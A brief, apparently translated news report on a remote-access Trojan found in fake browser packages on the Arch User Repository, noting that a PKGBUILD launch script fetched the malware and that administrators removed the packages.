In the repository aur (arch user repository) used in Arch Linux for spreading third-party packages, it has been reported that harmful code has been integrated into unique browser assemblies. Along with harmful packages like Firefox-Patch-Bin, Librewolf-Fix-Bin, and Zen-Browser-Patched-Bin, the package google-chrome-stable was also found to contain a malicious component that provides remote access to the system.
The issue was identified in the file pkgbuild, where it was discovered that the script for launching the browser google-chrome-stable.sh contained a command that loaded malicious software. This software, identified as a Trojan by virus scanning services, allows for remote control of the system, launching processes, transmitting files, inspecting traffic, and taking screenshots.
The malicious package, Harogle-Chrome-Stable, was downloaded and later removed by AUR administrators a few hours after its appearance. Subsequently, two more malicious packages named “chrome” and “chrome-bin” were loaded into AUR, further exacerbating the situation.